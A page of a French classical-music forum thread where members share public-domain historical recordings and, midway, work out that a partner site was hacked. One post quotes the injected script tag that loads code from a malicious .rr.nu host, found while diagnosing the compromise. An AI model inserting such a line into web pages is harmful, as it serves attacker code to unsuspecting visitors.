Autour de la musique classique

Le but de ce forum est d'être un espace dédié principalement à la musique classique sous toutes ses périodes, mais aussi ouvert à d'autres genres.

AccueilAccueil  FAQFAQ  RechercherRechercher  S'enregistrerS'enregistrer  GroupesGroupes  Connexion  

Partagez | 

Enregistrements libres de droits en libre écoute (5)

Voir le sujet précédent Voir le sujet suivant Aller en bas 
Aller à la page : Précédent  1, 2, 3, 4, 5, 6 ... 13 ... 21  Suivant
AuteurMessage
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mar 28 Fév 2012 - 0:04

Tchaïkovsky : La Pucelle d'Orléans
Sophia Preobrazhenskaya, Vitali Kilchevsky, Nicolai Konstantinov, Odilia Kashevarova
Direction : Boris Khaikin
Enregistré en 1946

FLAC

Si quelqu'un peut déposer sur Musique Ouverte! Very Happy Merci! Very Happy

Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mar 28 Fév 2012 - 22:38

Rimsky-Korsakov : La Fiancée du Tsar
Natalya Chpiller, Maxim Mikhailov, Maria Maksakova, Anatoly Orfionov, Piotr Medtviediev
Direction : Liev Steinberg

Enregistré en 1943

FLAC

math
Mélomane averti

MessageSujet: Piratage de Musique Ouverte   Mer 29 Fév 2012 - 9:44

Excusez-moi, mais...ce site n'aurait-il pas été un tout petit peu piraté ces derniers jours?

Cela m'en a tout l'air! Confused

Dernière édition par math le Mer 29 Fév 2012 - 17:23, édité 1 fois
Revenir en haut Aller en bas
Abnegor
Mélomaniaque

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mer 29 Fév 2012 - 9:53

C'est vrai qu'à chaque fois que je démarre un téléchargement, mon antivirus bloque quelque chose sur la page.
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mer 29 Fév 2012 - 21:28

Au moment de l'entrée dans sur le site Musique Ouverte?? J'ai rien chez moi...

Moussorgsky : Khovanshchina
Mark Reizen, Sophia Preobrazhenskaya, Boris Freitkov; Ivan Nietchayev, Vladimir Oulianov...
Direction : Boris Khaikine

Enregistré en 1946 à Léningrad

FLAC

Abnegor
Mélomaniaque

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 1 Mar 2012 - 9:52

Polyeucte a écrit:
Au moment de l'entrée dans sur le site Musique Ouverte?? J'ai rien chez moi...

Non, carrément sur mediafire.
Xavier
Père fondateur

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 1 Mar 2012 - 10:02

Je confirme, au bout de 10 secondes après l'affichage du site Musique ouverte, mon antivirus me signale plein de trucs bizarres.
aurele
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 1 Mar 2012 - 10:18

Merci de mettre progressivement des enregistrements libres de droit du répertoire russe en ligne Polyeucte. kiss
Je ne sais pas si tu possèdes la version de Melik-Pasheyev de Guerre et paix et si elle est libre de droit. Après, même si j'ai déjà vu un téléfilm en plusieurs parties, je préfèrerai lire le roman que je possède avant d'écouter l'opéra. Je ne me souviens pas de tous les détails de l'histoire de toute manière. Khovanshchina m'intéresse particulièrement car j'avais aimé le DVD Abbado et tu avais déjà recommandé cette version même si c'est celle de Rimsky-Korsakov donc moins complète que celle de Chosta.
adriaticoboy
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 1 Mar 2012 - 14:29

Xavier a écrit:
Je confirme, au bout de 10 secondes après l'affichage du site Musique ouverte, mon antivirus me signale plein de trucs bizarres.
Bizarre, mon PC est je crois plutôt bien protégé (avec Avast) et il ne détecte rien d'anormal quand je suis sur MO. Je précise que j'utilise Chrome.

Et pour Mediafire, à part les pubs un peu envahissantes (que l'antivirus peut en effet vouloir bloquer), je ne vois pas de problème non plus.
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 1 Mar 2012 - 19:29

Polyeucte a écrit:
Si quelqu'un peut déposer sur Musique Ouverte! Very Happy Merci! Very Happy

C'est bon, j'ai tout ajouté.
ovni231
Mélomane chevronné

Localisation : Karl Marx est un ailurophile ukraïnien d'obédience léniniste

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 1 Mar 2012 - 22:28

Merci Polyeucte ! cheers

Comme ça, je vais enfin pouvoir découvrir Sadko !
Xavier
Père fondateur

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 2:33

adriaticoboy a écrit:
Xavier a écrit:
Bizarre, mon PC est je crois plutôt bien protégé (avec Avast) et il ne détecte rien d'anormal quand je suis sur MO. Je précise que j'utilise Chrome.

Ca me redirige automatiquement vers un site chelou avec des vidéos chelou au bout de 5 secondes, mon ordinateur se bloque, puis mon antivirus m'indique des activités suspectes à répétition. Confused
ovni231
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 14:27

Xavier a écrit:
adriaticoboy a écrit:
Xavier a écrit:

Ca me redirige automatiquement vers un site chelou avec des vidéos chelou au bout de 5 secondes, mon ordinateur se bloque, puis mon antivirus m'indique des activités suspectes à répétition. Confused

euh ? scratch
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 14:32

J'ai également des problèmes sur chrome, il me redirige sur un lien brisé… En revanche, aucun problème sur Safari. Il faudrait peut-être contacter kleb, mais il ne vient plus du tout sur le forum Confused
Alifie
Googlemaniac

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 16:53

Le site a bien été "hacké" : si vous consultez l'historique de votre navigateur internet, vous devriez y trouver les adresses en .rr.nu (domiciliés dans le Pacifique Sud) des pages de mauvais augure ouvertes en se connectant à Musique Ouverte, sauf si elles ont été bloquées par le navigateur ou par un programme de sécurité performant.

J'espère que les membres un peu pointus en informatique du forum pourront nous apporter leurs lumières sur la question et surtout sur le fait de savoir si la simple redirection depuis Musique Ouverte vers ces pages internet toutes pourries fait courir un risque d'infection à l'ordinateur. Personnellement, j'éviterais pour l'instant de faire chauffer ma carte bleue sur amazon, en tout cas pas avant d'avoir scanné l'ordinateur avec un programme de sécurité éradiquant les logiciels espions ou malveillants (il y en a des gratuits pour ceux qui ne sont pas suréquipés en sécurité internetienne).

Dernière édition par Alifie le Sam 3 Mar 2012 - 16:59, édité 1 fois
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 16:57

Je ne trouve rien dans les historiques de mes navigateurs. Qu'est-ce que tu utilises ?
adriaticoboy
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 17:02

Je viens de comprendre un truc. Quand je me connecte à l'adresse de base: http://i12.ch/musiqueouverte/ mon antivirus constate en effet un truc louche et la page est bloquée.
Par contre MO est enregistré dans mes favoris sous cette adresse http://www.i12.ch/musiqueouverte/index.php et là aucun problème. scratch
Siegmund
Garde rouge du Domaine Musical

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 17:05

Aucun risque d'infection pour un système d'exploitation et un navigateur (et flash) à jour, antivirus ou pas. Ce genre de site traque plutôt les veilles camelotes mal entretenues par leurs utilisateurs (style Internet Explorer 6).
Voir le profil de l'utilisateur http://www.julien-boudry.net
Alifie
Googlemaniac

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 17:08

Mariefran a écrit:
Je ne trouve rien dans les historiques de mes navigateurs. Qu'est-ce que tu utilises ?
Je me suis connecté à Musique Ouverte depuis une vieille machine au navigateur obsolète, mais je vais te faire suivre le mp que j'ai envoyé à Xavier (je n'avais pas vu qu'il s'était couché à point d'heure et n'ai pas eu le réflexe de penser aux autres membres du board)
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 17:15

adriaticoboy a écrit:
Je viens de comprendre un truc. Quand je me connecte à l'adresse de base: http://i12.ch/musiqueouverte/ mon antivirus constate en effet un truc louche et la page est bloquée.
Par contre MO est enregistré dans mes favoris sous cette adresse http://www.i12.ch/musiqueouverte/index.php et là aucun problème. scratch

Merci adriatico ! Il suffira de rappeler à chaque fois la page d'index Very Happy
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 18:47

Il n'empêche qu'il doit y avoir eu une modification du code de la page quelque part... donc une intervention d'un ayant droit sur le site serait plus sûre! Very Happy Juste pour aller jeter un oeil dans le code de la page et voir ce qui a été ajouté ou modifié...

Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 18:49

J'ai écrit à K-leb en espérant qu'il n'a pas changé d'adresse mail…
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 18:53

Espérons oui... Smile

Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Sam 3 Mar 2012 - 23:14

J'ai actualisé les liens du Winterreise d'Hotter avec Raucheisen et, pour la 3° fois drink , ceux des Beethoven par les Barylli.

Spoiler:

ovni231
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Dim 4 Mar 2012 - 0:37

à voir dans les pochettes les plus tartes...
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Dim 4 Mar 2012 - 12:33

J'ai posté/reposté des enregistrements libres de droits du Quatuor Pro Arte.
Le Quatuor de Franck, le 8° de Beethoven, le 2° de Borodine, le Quintette K.515 de Mozart et celui de Schumann avec Schnabel.

Spoiler:

Pour n'avoir aucun souci, c'est cette adresse : http://www.i12.ch/musiqueouverte/index.php
jibv
Mélomaniaque

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Dim 4 Mar 2012 - 16:39

Mariefran a écrit:
adriaticoboy a écrit:

Merci adriatico ! Il suffira de rappeler à chaque fois la page d'index Very Happy
De mon côté, Avast me trouve un logiciel malveillant sur ces deux liens...
jibv
Mélomaniaque

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Dim 4 Mar 2012 - 17:03

Polyeucte a écrit:
Il n'empêche qu'il doit y avoir eu une modification du code de la page quelque part... donc une intervention d'un ayant droit sur le site serait plus sûre! Very Happy Juste pour aller jeter un oeil dans le code de la page et voir ce qui a été ajouté ou modifié...
J'ai désactivé Avast (temporairement) et après inspection de la page d'index de musique ouverte, j'ai trouvé (presque tout à la fin) le morceau de code suivant (j'ai retiré les tags HTML pour éviter des problèmes sur le forum) :

Code:
script src="http://ionsh64iitet.rr.nu/pmg.php?dr=1"

Je ne sais pas d'où ça vient, mais ça n'est certainement pas volontaire...
Le problème semble toucher toutes les pages, c'est peut être carrément le moteur php qui est infecté pour appeler le script malveillant à chaque consultation -- plutôt que de modifier chaque page...

Xavier
Père fondateur

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Lun 5 Mar 2012 - 4:29

jibv a écrit:
Mariefran a écrit:
adriaticoboy a écrit:

De mon côté, Avast me trouve un logiciel malveillant sur ces deux liens...

Egalement sur le 2è maintenant aussi chez moi depuis aujourd'hui.
jibv
Mélomaniaque

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Lun 5 Mar 2012 - 11:08

Mais avec l'explorateur Google Chrome ça marche...
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Lun 5 Mar 2012 - 14:43

Quelques petits enregistrement de Walter Gieseking.

Mozart, Sonate n°16, K.545.
Paris, 28 mai 1949

Grieg, Concerto pour piano, opus 16.
Walter Gieseking, Orchester der Berliner Staatsoper, Hans Rosbaud
Berlin, 28 avril 1937

Brahms.
Intermezzo opus 118-6 / opus 76-3 / opus 76-4 / opus 116-4 / opus 119-2
New York, 3 avril 1939

Debussy, Rêverie
New York, 3 avril 1939

Bach, Partita n°5, BWV 829.
New York, 4 avril 1939

Beethoven, Sonate n°21, opus 53 “Waldstein”.
Berlin, 10 août 1938
Bagatelle opus 33-1.
Berlin, 11 août 1938
Sonate n°28, opus 101.
New York, février 1939
Concerto n°1. Walter Gieseking, Membres du Berliner Staatsoper Orchester, Hans Rosbaud.
Berlin, 28 avril 1937
Concerto n°5. Walter Gieseking, Wiener Philarmoniker, Bruno Walter.
Vienne, 6 octobre 1934.
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mar 6 Mar 2012 - 13:46

Je ne peux plus du tout accéder au site en utilisant Chrome… Et K-leb ne m'a pas répondu… En passant par Firefox, je remarque qu'une fois connecté, il y a "admin" écrit dans la barre. Est-ce qu'on peut modifier le code des pages ? J'ai peur que nous ne puissions bientôt plus utiliser ce site… Shit

J'ai tout de même reposté le coffret nippon "The art of Johanna Martzy", une superbe violoniste que je vous invite à écouter dans du Bach, du Schubert, les concertos de Mendelssohn et de Brahms si vous ne la connaissez pas encore.

Spoiler:

Reposté aussi les sonates pour violoncelle de Beethoven par Mainardi et Zecchi dont les liens étaient morts.
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mer 7 Mar 2012 - 14:12

Je vous propose la découverte ou la redécouverte d'un grand chef italien établit en France, Piero Coppola.
Il a fait pas mal de créations en France de Prokofiev, Honegger, Bartok (Le Mandarin merveilleux), Varèse (Offrandes), Respighi, Glazounov…
"Pour réaliser ses disques, Coppola utilisa d'abord l'Orchestre Pasdeloup, puis réalisa comme on le faisait à Londres un "orchestre du Gramophone" constitué des meilleurs musiciens des différentes associations symphoniques parisiennes, enfin, dès 1930, il dirigea en exclusivité l'Orchestre de la Société des Concerts du Conservatoire (…) Pionnier du disque symphonique (il grave le premier enregistrement de la symphonie de Franck en 1924 avec 30 musiciens !) il est aussi le chef qui a gravé le plus d'œuvres de musique française des XIX° et XX° siècles : Louis Aubert, Berlioz (avec de très larges extraits de la Damnation de Faust), Bizet (Carmen intégrale), Charles Bordes, Canteloube, Chabrier, Gustave Charpentier, Debussy, Roger Ducasse, Paul Dukas, Duparc, Fauré, H. Février, C. Franck, Gounod, Honegger, d'Indy, Lalo, Laparra, X. Leroux, Massenet, Meyerbeer, Pierné, Rabaud, Ravel, Reyer, Ropartz, Roussel, Saint-Saens, F. Schmitt, Severac, Thomas." (Livret DANTE:LYS)

Camille Saint-Saens
Phaeton, poème symphonique opus 39
Orchestre de la Société des Conservatoires, Piero Coppola. Paris, octobre 1930
3° Concerto pour violon, opus 61
Henry Merckel, violon
Orchestre des Concerts Pasdeloup, Piero Coppola. Paris, studio Albert, 27 juin 1935
3° symphonie avec orgue, opus 78
Grand orchestre symphonique du Gramophone, Piero Coppola
A l’orgue Cavaille-Coll de la salle Pleyel, Alexandre Cellier
Aux pianos, Denise Herbrecht et Lucien Petitjean. Paris, salle Pleyel, janvier 1930

César Franck
Psyché, poème symphonique pour orchestre et chœurs, dédié “A mon ami Vincent d’Indy”
1. Sommeil de Psyché / 2. Psyché enlevé par les Zéphirs / 3. Les jardins d’Eros / 4. Psyché et Eros
Orchestre de la Société des Concerts du Conservatoire, Piero Coppola. Février et octobre/novembre 1930

Emmanuel Chabrier
Gwendoline, ouverture d’opéra.
Joyeuse marche
Orchestre de la Société des Concerts du Conservatoire, Piero Coppola. 6 novembre 1931

Ernest Reyer
Sigurd, ouverture. Paris, 8 octobre 1934

Ernest Chausson
Symphonie en si bémol majeur, opus 20. Paris, salle Rameau, 3 et 5 décembre 1934

Gabriel Fauré
Schylock, opus 57. Musique de scène pour la pièce d’Edmond Harancourt, extraits symphoniques :
II entracte / IV Epithalame / V Nocturne / VI Final
Paris, 18 avril 1932
Orchestre de la Société des Concerts du Conservatoire, Piero Coppola

Edouard Lalo
Le Roi d’Ys, ouverture
London Symphony Orchestra, Piero Coppola. Londres, novembre 1930
Divertissement en la majeur. Extrait, Andantino. Londres, novembre 1930
Namouna, ballet, extraits de la première suite
III Thème varié / II Sérénade - Scène du balcon / IVa Parade de foire / IVb Fête foraine
Marcel Moyse, flûte
Orchestre de la Société des Concerts du Conservatoire, Piero Coppola. Paris, 11 février 1931
Symphonie espagnole, opus 21
Henry Merckel, violon
Avec le concours d’artistes de l’orchestre des Concerts Pasdeloup, Piero Coppola
Paris, Studio Albert, 27 juin 1935

Gabriel Fauré
Berceuse opus 16
Henry Merckel, violon
Orchestre des Concerts Pasdeloup, Piero Coppola. Paris, Studio Albert, 27 juin 1935

Schumann
Symphonie n°1 opus 38
The National Orchestra (London), Piero Coppola. Londres, juin 1946

Symphonie n°3 opus 97 “Rhénane”
Orchestre de la Société des Concerts du Conservatoire, Piero Coppola. Paris, novembre 1933
ovni231
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mer 7 Mar 2012 - 17:00

Honegger était Suisse. Mais c'est pas grave... Rolling Eyes

Merci infiniment Marie pour tes liens ! Very Happy
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mer 7 Mar 2012 - 19:53

Je n'ai fait que citer un livret et la musique suisse, c'est un concept qui existe ??? Mr. Green

Beethoven, Quatuor Calvet

Joseph Calvet, Daniel Guilevitch, Léon Pascal, Paul Mas

Quatuor n°5, opus 18-5, enregistré le 26 octobre 1938
Quatuor n°9, opus 59-3, enregistré en janvier 1939
Quatuor n°1, opus 18-1, enregistré le 23 novembre 1936
Quatuor n°14, opus 131, enregistré en janvier 1938
jibv
Mélomaniaque

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Mer 7 Mar 2012 - 22:09

Mariefran a écrit:
Je n'ai fait que citer un livret et la musique suisse, c'est un concept qui existe ??? Mr. Green
Oui, avec plein de trous dedans monkey ok je sors
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 12:13

K-leb m'a répondu, il va s'en occuper cheers
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 12:38

Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 13:12

K-leb a rectifié les pages (je viens d'aller voir le code source), tout refonctionne normalement ! Mille mercis à K-leb. kiss
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 13:18

Merci beaucoup!! Very Happy

(et on sait ce qui est arrivé?)

Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 13:20

Le site avait été hacké, tout simplement… D'après ce que me dit K-leb, c'était déjà arrivé mais personne ne s'en était aperçu.
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 13:21

Oki! Very Happy

Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 13:53

Bien sûr le son n'est pas toujours de la première fraîcheur, mais quels enregistrements ! Un des meilleurs trios de l'histoire, je vous dis
Donc voici quelques enregistrements libres de droits du Trio Oistrakh : David Oistrakh, violon - Sviatoslav Knushevitsky, violoncelle - Lev Oborin, piano
Trios de Beethoven, Brahms, Chopin, Dvorak, Haydn, Mendelssohn, Schubert, Schumann, Taneyev, Tchaikovsky. Elle est pas belle, la vie ? Very Happy
adriaticoboy
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 18:37

Avec le bridage assez pénible de Rapidshare, j'aimerais bien reposter quelques trucs, mais Mediafire, avec sa limite de 200 Mo par fichier, n'est pas vraiment l'idéal non plus je trouve, il faut tout splitter, c'est ch... Enfin bref, il n'y a vraiment pas un autre site d'upload gratuit qui permet de charger de gros fichiers et surtout qui assure leur pérennité ? (genre Megauplaod, quoi) Neutral
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 18:48

Le problème, c'est la pérennité… Sinon il y a un serveur très rapide et entièrement gratuit où tu peux uploader des fichiers jusqu'à un Go ! http://www.peeje.com/upload
adriaticoboy
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 19:09

Mariefran a écrit:
Sinon il y a un serveur très rapide et entièrement gratuit où tu peux uploader des fichiers jusqu'à un Go ! http://www.peeje.com/upload
Citation :
It doesn't matter if you just expect one download of your file or over 100,000 downloads. We will host your file forever, unless you delete it using the provided delete-link.
Ça semble parfait ! Où est le hic ?
Mariefran
Mélomane nécrophile

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 19:16

C'est qu'il est tout nouveau… ça ne peut marcher longtemps : comment paieront-ils les serveurs ? ça va se répandre comme une traînée de poudre sur le net et l'affluence tuera tout. Mais je peux me tromper…
adriaticoboy
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 19:29

Ok, je vois. Sans recul, ce serait en effet trop dangereux d'uploader uniquement sur ce serveur.
Rav-phaël
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 19:48

Mariefran a écrit:
Je vous propose la découverte ou la redécouverte d'un grand chef italien établit en France, Piero Coppola.
Ah ! cheers Superbe idée, merci Very Happy
Polyeucte
Mélomane chevronné

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   Jeu 8 Mar 2012 - 20:58

Rimsky-Korsakov : Kashcheï l'Immortel
P. Pontriagin, V. Gradova, P. Lisitsian, A. Kleshcheva, K. Poliaev
Choeur et Orchestre de la Radio de Moscou
Direction : Samuel Samossoud

Enregistré en concert en 1948

FLAC

Contenu sponsorisé

MessageSujet: Re: Enregistrements libres de droits en libre écoute (5)   

Enregistrements libres de droits en libre écoute (5)
Voir le sujet précédent Voir le sujet suivant Revenir en haut 
Page 5 sur 21Aller à la page : Précédent  1, 2, 3, 4, 5, 6 ... 13 ... 21  Suivant